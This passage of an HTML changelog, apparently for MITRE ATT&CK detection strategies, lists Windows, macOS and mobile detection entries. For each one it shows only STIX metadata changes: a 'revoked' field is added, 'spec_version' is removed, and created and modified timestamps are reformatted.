black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0418] Windows DACL Manipulation Behavioral Chain Detection Strategy</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0026] Windows Detection Strategy for T1547.012 - Print Processor DLL Persistence</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0395] macOS AuthorizationExecuteWithPrivileges Elevation Prompt Detection</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details></details><h3>mobile-attack</h3><details><summary>Patches</summary><hr><h4>[DET0697] Detection of Abuse Accessibility Features</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0642] Detection of Abuse Elevation Control Mechanism</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0611] Detection of Access Notifications</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0605] Detection of Account Access Removal</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0635] Detection of Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0623] Detection of Adversary-in-the-Middle</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0685] Detection of Application Layer Protocol</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0652] Detection of Application Versioning</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0670] Detection of Archive Collected Data</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0667] Detection of Asymmetric Cryptography</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0673] Detection of Audio Capture</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0700] Detection of Bidirectional Communication</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0654] Detection of Boot or Logon Initialization Scripts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px 